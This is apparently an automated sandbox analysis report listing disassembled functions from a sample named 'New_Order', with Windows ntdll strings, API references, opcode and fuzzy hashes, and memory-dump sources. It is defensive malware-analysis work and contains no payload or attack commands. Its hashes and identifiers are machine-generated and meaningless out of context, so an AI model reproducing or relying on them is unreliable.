                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 9d43d3cd4eb14f77932380df5f3dae533643dae4072c2b326f51ded7cbb34509
                                                                                                • Instruction ID: cb2e771ac19efdabc4b6490d9849e7fb33c3c4c19418cc5be38ffb903b16ecb3
                                                                                                • Opcode Fuzzy Hash: 9d43d3cd4eb14f77932380df5f3dae533643dae4072c2b326f51ded7cbb34509
                                                                                                • Instruction Fuzzy Hash: 79E06DB2204248BBD614EE59DC45F9B37ADEFC8710F004419FA08A7242D670B9218BB8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00428513 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ExitProcess.KERNEL32(?,00000000,?,?,36AF85BC,?,?,36AF85BC), ref: 00428547
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1845613526.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_New_Order.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: a930c4393d5ef3856df2fdd760abe113302f5a7255de85c6d70986c5bc18081f
                                                                                                • Instruction ID: afaea05da308fcc21add0984d9e8b50a37df85d190c19692abd9564f570de8a5
                                                                                                • Opcode Fuzzy Hash: a930c4393d5ef3856df2fdd760abe113302f5a7255de85c6d70986c5bc18081f
                                                                                                • Instruction Fuzzy Hash: 0AE04F762042147BD110AA5ADC05F97775CDBC5760F00442AFA0867241C675B91186F4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 8f355093e32fabdb1e964ee6f99810bdfc21c6f7a86862ec1dcc87009afe4943
                                                                                                • Instruction ID: 6ee1ef14557bf4e67634dd946b4d46ce938d63fd33ce80f8743cd70f54a0a073
                                                                                                • Opcode Fuzzy Hash: 8f355093e32fabdb1e964ee6f99810bdfc21c6f7a86862ec1dcc87009afe4943
                                                                                                • Instruction Fuzzy Hash: 0FB09B719115D5C5DA11E7648A08717791077D0701F16C165D3030641F4738C1D1E376
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 01338D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01338E3F
                                                                                                • The critical section is owned by thread %p., xrefs: 01338E69
                                                                                                • The resource is owned shared by %d threads, xrefs: 01338E2E
                                                                                                • The resource is owned exclusively by thread %p, xrefs: 01338E24
                                                                                                • *** enter .exr %p for the exception record, xrefs: 01338FA1
                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01338D8C
                                                                                                • *** then kb to get the faulting stack, xrefs: 01338FCC
                                                                                                • *** Inpage error in %ws:%s, xrefs: 01338EC8
                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01338DB5
                                                                                                • a NULL pointer, xrefs: 01338F90
                                                                                                • *** enter .cxr %p for the context, xrefs: 01338FBD
                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01338DD3
                                                                                                • <unknown>, xrefs: 01338D2E, 01338D81, 01338E00, 01338E49, 01338EC7, 01338F3E
                                                                                                • an invalid address, %p, xrefs: 01338F7F
                                                                                                • Go determine why that thread has not released the critical section., xrefs: 01338E75
                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01338F26
                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01338F2D
                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01338E02
                                                                                                • read from, xrefs: 01338F5D, 01338F62
                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01338F3F
                                                                                                • write to, xrefs: 01338F56
                                                                                                • This failed because of error %Ix., xrefs: 01338EF6
                                                                                                • The instruction at %p tried to %s , xrefs: 01338F66
                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01338FEF
                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01338E86
                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01338DC4
                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01338E4B
                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01338F34
                                                                                                • The instruction at %p referenced memory at %p., xrefs: 01338EE2
                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01338DA3
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                • API String ID: 0-108210295
                                                                                                • Opcode ID: d08dd575ec42cee468a79b3d9660206f0f0f1f729d6185be3759a54881f3dd6f
                                                                                                • Instruction ID: 3be48a5185a66aa22cf58f8f32a885433145bfc2678b56811b42b64b1604f294
                                                                                                • Opcode Fuzzy Hash: d08dd575ec42cee468a79b3d9660206f0f0f1f729d6185be3759a54881f3dd6f
                                                                                                • Instruction Fuzzy Hash: 6E810379A54214BFDB22EA19DC49D7B3F7DEF96B18F010188F2086F252E3758401DB66
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01302349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2160512332
                                                                                                • Opcode ID: e6407f32f1542ebbbece80c98277309c6dbeb7468f58d5f1ea64001beddb2f42
                                                                                                • Instruction ID: 754d23f88fb2605667056872a2d3e0b5d6e40457aaff78624fcab8d79d0a2626
                                                                                                • Opcode Fuzzy Hash: e6407f32f1542ebbbece80c98277309c6dbeb7468f58d5f1ea64001beddb2f42
                                                                                                • Instruction Fuzzy Hash: 0192CF71614742AFE722DF28C894F6BBBE8BB84758F04491DFA94D7290D770E844CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • double initialized or corrupted critical section, xrefs: 012F5508
                                                                                                • corrupted critical section, xrefs: 012F54C2
                                                                                                • Critical section debug info address, xrefs: 012F541F, 012F552E
                                                                                                • Thread identifier, xrefs: 012F553A
                                                                                                • undeleted critical section in freed memory, xrefs: 012F542B
                                                                                                • 8, xrefs: 012F52E3
                                                                                                • Critical section address, xrefs: 012F5425, 012F54BC, 012F5534
                                                                                                • Invalid debug info address of this critical section, xrefs: 012F54B6
                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012F540A, 012F5496, 012F5519
                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 012F5543
                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012F54CE
                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012F54E2
                                                                                                • Critical section address., xrefs: 012F5502
                                                                                                • Address of the debug info found in the active list., xrefs: 012F54AE, 012F54FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                • API String ID: 0-2368682639
                                                                                                • Opcode ID: cff1379b7c668736af161a5aef29177b1410666df1b4fb46bcbee40aa00d30eb
                                                                                                • Instruction ID: c3ad47d097e4ad118bccf96f95adeee294ddd02bd598677aea9ae607e4f6ad07
                                                                                                • Opcode Fuzzy Hash: cff1379b7c668736af161a5aef29177b1410666df1b4fb46bcbee40aa00d30eb
                                                                                                • Instruction Fuzzy Hash: D1817EB1A60359EFDB20CF99C945BAEBBB9FB08714F10412DF604B7680D3B5A981CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012F24C0
                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 012F2412
                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 012F2624
                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012F22E4
                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 012F2506
                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 012F2409
                                                                                                • @, xrefs: 012F259B
                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012F25EB
                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 012F261F
                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 012F2498
                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 012F2602
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                • API String ID: 0-4009184096
                                                                                                • Opcode ID: c19b77dec9924c90ec8b17d644912e8f5634b2a7775332980d84d6b3f31db1f9
                                                                                                • Instruction ID: 78f6583f6210de5ded6d195763026b0cdcb9a66ba437ab34ec8e0470d90d374c
                                                                                                • Opcode Fuzzy Hash: c19b77dec9924c90ec8b17d644912e8f5634b2a7775332980d84d6b3f31db1f9
                                                                                                • Instruction Fuzzy Hash: 270270F1D20229DBDB31DB54CC81BE9B7B8AB55704F0141EAE709A7241EB70AE84CF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01328B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                • API String ID: 0-2515994595
                                                                                                • Opcode ID: 8e253c9847e16556f569c42a0778c897c717c8739f80273d3e547af038d1d8e3
                                                                                                • Instruction ID: d51863aaec427397732c7d6a0872261dbe18f327d1bcd53fb98911b8066ccb3a
                                                                                                • Opcode Fuzzy Hash: 8e253c9847e16556f569c42a0778c897c717c8739f80273d3e547af038d1d8e3
                                                                                                • Instruction Fuzzy Hash: 2B51D1711243259BC729EF188884BABBBECEF94758F544A5DEA59C3240E770D608CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0129AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                • API String ID: 0-3197712848
                                                                                                • Opcode ID: 72c8d4811ffb404dde03b108a10c89e0080d804f5c2f3a513ead92a9fdd3eb94
                                                                                                • Instruction ID: 304cc42994b7d81a0971718c40e7462f9e016d1279cef0b8aad5703bac56e445
                                                                                                • Opcode Fuzzy Hash: 72c8d4811ffb404dde03b108a10c89e0080d804f5c2f3a513ead92a9fdd3eb94
                                                                                                • Instruction Fuzzy Hash: DB12E1716283428BDB25DF2CC485BBABBE4BF94704F44052DFAC98B291E774D944CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01330274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                • API String ID: 0-1700792311
                                                                                                • Opcode ID: 946e1fdfce7b964d7d4b4fd47d2cf93419ce0caa137c0f18a523baec156f51f6
                                                                                                • Instruction ID: be72eb443161e99b681669d72a7112975b4a5b870776b8d71fa3ee8e73ce0f30
                                                                                                • Opcode Fuzzy Hash: 946e1fdfce7b964d7d4b4fd47d2cf93419ce0caa137c0f18a523baec156f51f6
                                                                                                • Instruction Fuzzy Hash: EFD1EF31610686DFDB2ADF68C840AAEFBF5FF89718F088059F455AB652C734A941CF18
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • VerifierDebug, xrefs: 01308CA5
                                                                                                • VerifierDlls, xrefs: 01308CBD
                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01308B8F
                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01308A3D
                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01308A67
                                                                                                • VerifierFlags, xrefs: 01308C50
                                                                                                • HandleTraces, xrefs: 01308C8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                • API String ID: 0-3223716464
                                                                                                • Opcode ID: 117dbd2304fc7f41412cd1e63c7917d4a07bce1540608b5cb010bd128cbd8ab8
                                                                                                • Instruction ID: 3c32f54df28101630d1996d480027cb117a81743fa020439d8042c24b6a04f6e
                                                                                                • Opcode Fuzzy Hash: 117dbd2304fc7f41412cd1e63c7917d4a07bce1540608b5cb010bd128cbd8ab8
                                                                                                • Instruction Fuzzy Hash: DA912572A51716AFE737EF2C88A0B6A77E8AB5871CF050598FA446B6C1D7309C00CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                • API String ID: 0-1109411897
                                                                                                • Opcode ID: 69ed85f948a041a6c5ab8623eb73c0dd6e48f379b00ae45c32d8b88c12f9494e
                                                                                                • Instruction ID: c07405d50a1f5375c5e291927946bc792ca9e325c0b0e81593816131a3e11169
                                                                                                • Opcode Fuzzy Hash: 69ed85f948a041a6c5ab8623eb73c0dd6e48f379b00ae45c32d8b88c12f9494e
                                                                                                • Instruction Fuzzy Hash: 24A25C70A2666A8FDB64EF18CD887A9BBB5EF45304F5442E9D50DA7290DB709E80CF00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-792281065
                                                                                                • Opcode ID: 8cd59db889765dc1bbe806074238b2004b06c2ed9a0be2cb82e5fed5c389ebd6
                                                                                                • Instruction ID: f24ce548b16c2298d930d5630c308f864a63590ed0f4bb3f97c4a79cf367b514
                                                                                                • Opcode Fuzzy Hash: 8cd59db889765dc1bbe806074238b2004b06c2ed9a0be2cb82e5fed5c389ebd6
                                                                                                • Instruction Fuzzy Hash: A3911770A21756DBEB3AEF18D895BABBBB9EB40B54F04013CD70067281D7B89841CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012D9A11, 012D9A3A
                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 012D9A2A
                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 012D9A01
                                                                                                • apphelp.dll, xrefs: 01276496
                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 012D99ED
                                                                                                • LdrpInitShimEngine, xrefs: 012D99F4, 012D9A07, 012D9A30
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-204845295
                                                                                                • Opcode ID: 4499210dc2ee94ecfccb553cfbec955cf89deddf0a7f5f47dd2930b4c677ecfa
                                                                                                • Instruction ID: 6b59276e7651f0ce6eadbb6aa2a4ee0322167d89c22d936fe1faee5ed5a92136
                                                                                                • Opcode Fuzzy Hash: 4499210dc2ee94ecfccb553cfbec955cf89deddf0a7f5f47dd2930b4c677ecfa
                                                                                                • Instruction Fuzzy Hash: 4D51C2712387059FEB21DF24D881BABB7E8FB84748F00091DF685971A0D670E944CB93
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 012F2165
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 012F2178
                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 012F219F
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 012F2180
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012F21BF
                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 012F2160, 012F219A, 012F21BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                • API String ID: 0-861424205
                                                                                                • Opcode ID: deb9c51e94172c464bd7d6e79bc9e38f9a64970a94a5877a25155e301f8697d9
                                                                                                • Instruction ID: 3d25cfbcc99fcfbc10b30861bec25cafbc90985b1e5f1e391f6f29e41f423d3e
                                                                                                • Opcode Fuzzy Hash: deb9c51e94172c464bd7d6e79bc9e38f9a64970a94a5877a25155e301f8697d9
                                                                                                • Instruction Fuzzy Hash: 2831573AB70316F7E7218A998C85F9BBA6CDB62B84F05406CBB0467181D270EE00D7A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 012BC6C3
                                                                                                • LdrpInitializeProcess, xrefs: 012BC6C4
                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 012F8170
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 012F8181, 012F81F5
                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 012F81E5
                                                                                                • LdrpInitializeImportRedirection, xrefs: 012F8177, 012F81EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-475462383
                                                                                                • Opcode ID: 615b2a2a62331d6ca330b3a46dfd3178016dc1bd9b7adf73004794eaef82c265
                                                                                                • Instruction ID: 38ce6327c8c9f57f7f308acc9ef1a7fc7eda94e6ada4ce4b98ecc9322e031bf0
                                                                                                • Opcode Fuzzy Hash: 615b2a2a62331d6ca330b3a46dfd3178016dc1bd9b7adf73004794eaef82c265
                                                                                                • Instruction Fuzzy Hash: 2A3129716643429FD324EF29DC86E2BB7D8EFD4B10F04052CFA446B291E620EC04CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 012C2DF0: LdrInitializeThunk.NTDLL ref: 012C2DFA
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0BA3
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0BB6
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0D60
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012C0D74
                                                                                                Memory Dump Source
